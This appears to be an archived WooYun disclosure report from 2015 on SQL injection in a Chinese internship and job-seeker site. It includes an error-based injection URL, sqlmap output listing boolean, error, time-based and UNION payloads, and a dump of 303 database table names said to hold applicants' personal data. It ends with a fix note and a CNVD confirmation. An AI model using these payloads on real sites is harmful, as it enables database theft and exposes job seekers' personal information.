乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-30: 细节已通知厂商并且等待厂商处理中 2015-10-10: 厂商已经确认,细节仅向厂商公开 2015-10-20: 细节向核心白帽子及相关领域专家公开 2015-10-30: 细节向普通白帽子公开 2015-11-09: 细节向实习白帽子公开 2015-11-24: 细节向公众公开
实习生,学生,各种求职生信息..
http://**.**.**.**/shixibao/e/extend/company.php?id=10504
http://**.**.**.**/shixibao/e/extend/company.php?id=10504%20and (select 1 from (select count(*),concat((select version()),floor(rand(0)*2))x from information_schema.tables group by x)a)#
user:admin@**.**.**.**database:shixibao1version:5.6.16-log1
丢sqlmap跑一下
300个表,里面有大量实习生,求职生信息
sqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: id=-2685 OR 5746=5746# Type: error-based Title: MySQL OR error-based - WHERE or HAVING clause Payload: id=-9802 OR 1 GROUP BY CONCAT(0x716b767671,(SELECT (CASE WHEN (5242=5242) THEN 1 ELSE 0 END)),0x717a706a71,FLOOR(RAND(0)*2)) HAVING MIN(0)# Type: AND/OR time-based blind Title: MySQL >= 5.0.12 time-based blind - Parameter replace Payload: id=(SELECT (CASE WHEN (5004=5004) THEN SLEEP(5) ELSE 5004*(SELECT 5004 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) Type: UNION query Title: MySQL UNION query (random number) - 1 column Payload: id=-8000 UNION ALL SELECT CONCAT(0x716b767671,0x55514d6d4364655a7662,0x717a706a71)#---web server operating system: Windowsweb application technology: PHP 5.5.11, Apache 2.4.9back-end DBMS: MySQL 5.0.12Database: shixibao[303 tables]+-------------------------------------+| ecms_post_mapping || ecms_post_mapping_history || mm_zhiweiapply_view || phome_ecms_article || phome_ecms_article_check || phome_ecms_article_check_data || phome_ecms_article_data_1 || phome_ecms_article_doc || phome_ecms_article_doc_data || phome_ecms_article_doc_index || phome_ecms_article_index || phome_ecms_download || phome_ecms_download_check || phome_ecms_download_check_data || phome_ecms_download_data_1 || phome_ecms_download_doc || phome_ecms_download_doc_data || phome_ecms_download_doc_index || phome_ecms_download_index || phome_ecms_flash || phome_ecms_flash_check || phome_ecms_flash_check_data || phome_ecms_flash_data_1 || phome_ecms_flash_doc || phome_ecms_flash_doc_data || phome_ecms_flash_doc_index || phome_ecms_flash_index || phome_ecms_info || phome_ecms_info_check || phome_ecms_info_check_data || phome_ecms_info_data_1 || phome_ecms_info_doc || phome_ecms_info_doc_data || phome_ecms_info_doc_index || phome_ecms_info_index || phome_ecms_infoclass_article || phome_ecms_infoclass_download || phome_ecms_infoclass_flash || phome_ecms_infoclass_info || phome_ecms_infoclass_movie || phome_ecms_infoclass_news || phome_ecms_infoclass_photo || phome_ecms_infoclass_shop || phome_ecms_infoclass_tongzhi || phome_ecms_infoclass_zhiwei || phome_ecms_infoclass_zhiwei1 || phome_ecms_infoclass_zhiwei2 || phome_ecms_infoclass_zt || phome_ecms_infotmp_article || phome_ecms_infotmp_download || phome_ecms_infotmp_flash || phome_ecms_infotmp_info || phome_ecms_infotmp_movie || phome_ecms_infotmp_news || phome_ecms_infotmp_photo || phome_ecms_infotmp_shop || phome_ecms_infotmp_tongzhi || phome_ecms_infotmp_zhiwei || phome_ecms_infotmp_zhiwei1 || phome_ecms_infotmp_zhiwei2 || phome_ecms_infotmp_zt || phome_ecms_jianzhi_crawl || phome_ecms_jianzhi_crawl_test || phome_ecms_locationorder || phome_ecms_movie || phome_ecms_movie_check || phome_ecms_movie_check_data || phome_ecms_movie_data_1 || phome_ecms_movie_doc || phome_ecms_movie_doc_data || phome_ecms_movie_doc_index || phome_ecms_movie_index || phome_ecms_news || phome_ecms_news_check || phome_ecms_news_check_data || phome_ecms_news_data_1 || phome_ecms_news_doc || phome_ecms_news_doc_data || phome_ecms_news_doc_index || phome_ecms_news_index || phome_ecms_photo || phome_ecms_photo_check || phome_ecms_photo_check_data || phome_ecms_photo_data_1 || phome_ecms_photo_doc || phome_ecms_photo_doc_data || phome_ecms_photo_doc_index || phome_ecms_photo_index || phome_ecms_shop || phome_ecms_shop_check || phome_ecms_shop_check_data || phome_ecms_shop_data_1 || phome_ecms_shop_doc || phome_ecms_shop_doc_data || phome_ecms_shop_doc_index || phome_ecms_shop_index || phome_ecms_tongzhi || phome_ecms_tongzhi_check || phome_ecms_tongzhi_check_data || phome_ecms_tongzhi_data_1 || phome_ecms_tongzhi_doc || phome_ecms_tongzhi_doc_data || phome_ecms_tongzhi_doc_index || phome_ecms_tongzhi_index || phome_ecms_zhiwei || phome_ecms_zhiwei1 || phome_ecms_zhiwei1_check || phome_ecms_zhiwei1_check_data || phome_ecms_zhiwei1_data_1 || phome_ecms_zhiwei1_doc || phome_ecms_zhiwei1_doc_data || phome_ecms_zhiwei1_doc_index || phome_ecms_zhiwei1_index || phome_ecms_zhiwei2 || phome_ecms_zhiwei2_check || phome_ecms_zhiwei2_check_data || phome_ecms_zhiwei2_data_1 || phome_ecms_zhiwei2_doc || phome_ecms_zhiwei2_doc_data || phome_ecms_zhiwei2_doc_index || phome_ecms_zhiwei2_index || phome_ecms_zhiwei_check || phome_ecms_zhiwei_check_data || phome_ecms_zhiwei_crawl || phome_ecms_zhiwei_crawl_1 || phome_ecms_zhiwei_crawl_copy || phome_ecms_zhiwei_crawl_copy_backup || phome_ecms_zhiwei_crawl_copy_cl || phome_ecms_zhiwei_crawl_sxs || phome_ecms_zhiwei_crawl_sxs1 || phome_ecms_zhiwei_crawl_sxs_copy || phome_ecms_zhiwei_crawl_test || phome_ecms_zhiwei_data_1 || phome_ecms_zhiwei_doc || phome_ecms_zhiwei_doc_data || phome_ecms_zhiwei_doc_index || phome_ecms_zhiwei_history || phome_ecms_zhiwei_index || phome_ecms_zt || phome_ecms_zt_check || phome_ecms_zt_check_data || phome_ecms_zt_data_1 || phome_ecms_zt_doc || phome_ecms_zt_doc_data || phome_ecms_zt_doc_index || phome_ecms_zt_index || phome_enewsad || phome_enewsadclass || phome_enewsadminstyle || phome_enewsbefrom || phome_enewsbq || phome_enewsbqclass || phome_enewsbqtemp || phome_enewsbqtempclass || phome_enewsbuybak || phome_enewsbuygroup || phome_enewscard || phome_enewsclass || phome_enewsclass_stats || phome_enewsclass_stats_ip || phome_enewsclass_stats_set || phome_enewsclassadd || phome_enewsclassf || phome_enewsclassnavcache || phome_enewsclasstemp || phome_enewsclasstempclass || phome_enewsdiggips || phome_enewsdo || phome_enewsdolog || phome_enewsdownerror || phome_enewsdownrecord || phome_enewsdownurlqz || phome_enewserrorclass || phome_enewsf || phome_enewsfava || phome_enewsfavaclass || phome_enewsfeedback || phome_enewsfeedbackclass || phome_enewsfeedbackf || phome_enewsfile_1 || phome_enewsfile_member || phome_enewsfile_other || phome_enewsfile_public || phome_enewsgbook || phome_enewsgbookclass || phome_enewsgfenip || phome_enewsgroup || phome_enewshmsg || phome_enewshnotice || phome_enewshy || phome_enewshyclass || phome_enewsindexpage || phome_enewsinfoclass || phome_enewsinfotype || phome_enewsinfovote || phome_enewsjstemp || phome_enewsjstempclass || phome_enewskey || phome_enewskeyclass || phome_enewslink || phome_enewslinkclass || phome_enewslinktmp || phome_enewslisttemp || phome_enewslisttempclass || phome_enewslog || phome_enewsloginfail || phome_enewsmember || phome_enewsmember_connect || phome_enewsmember_connect_app || phome_enewsmemberadd || phome_enewsmemberf || phome_enewsmemberfeedback || phome_enewsmemberform || phome_enewsmembergbook || phome_enewsmembergroup || phome_enewsmemberpub || phome_enewsmenu || phome_enewsmenuclass || phome_enewsmod || phome_enewsnewstemp || phome_enewsnewstempclass || phome_enewsnotcj || phome_enewsnotice || phome_enewspage || phome_enewspageclass || phome_enewspagetemp || phome_enewspayapi || phome_enewspayrecord || phome_enewspic || phome_enewspicclass || phome_enewspl_1 || phome_enewspl_set || phome_enewsplayer || phome_enewsplf || phome_enewspltemp || phome_enewspostdata || phome_enewspostserver || phome_enewsprinttemp || phome_enewspublic || phome_enewspublic_update || phome_enewspubtemp || phome_enewspubvar || phome_enewspubvarclass || phome_enewsqmsg || phome_enewssearch || phome_enewssearchall || phome_enewssearchall_load || phome_enewssearchtemp || phome_enewssearchtempclass || phome_enewsshop_address || phome_enewsshop_ddlog || phome_enewsshop_precode || phome_enewsshop_set || phome_enewsshopdd || phome_enewsshopdd_add || phome_enewsshoppayfs || phome_enewsshopps || phome_enewssp || phome_enewssp_1 || phome_enewssp_2 || phome_enewssp_3 || phome_enewssp_3_bak || phome_enewsspacestyle || phome_enewsspclass || phome_enewssql || phome_enewstable || phome_enewstags || phome_enewstagsclass || phome_enewstagsdata || phome_enewstask || phome_enewstempbak || phome_enewstempdt || phome_enewstempgroup || phome_enewstempvar || phome_enewstempvarclass || phome_enewstogzts || phome_enewsuser || phome_enewsuseradd || phome_enewsuserclass || phome_enewsuserjs || phome_enewsuserjsclass || phome_enewsuserlist || phome_enewsuserlistclass || phome_enewsuserloginck || phome_enewsvote || phome_enewsvotemod || phome_enewsvotetemp || phome_enewswapstyle || phome_enewswfinfo || phome_enewswfinfolog || phome_enewswords || phome_enewsworkflow || phome_enewsworkflowitem || phome_enewswriter || phome_enewsyh || phome_enewszt || phome_enewsztadd || phome_enewsztclass || phome_enewsztf || phome_enewsztinfo || phome_enewszttype || phome_enewszttypeadd || yjsqzw |+-------------------------------------+
参数过滤
危害等级:高
漏洞Rank:12
确认时间:2015-10-10 16:40
CNVD确认并复现所述情况,已经转由CNCERT向中国电信集团公司通报,由其后续协调网站管理单位处置。
暂无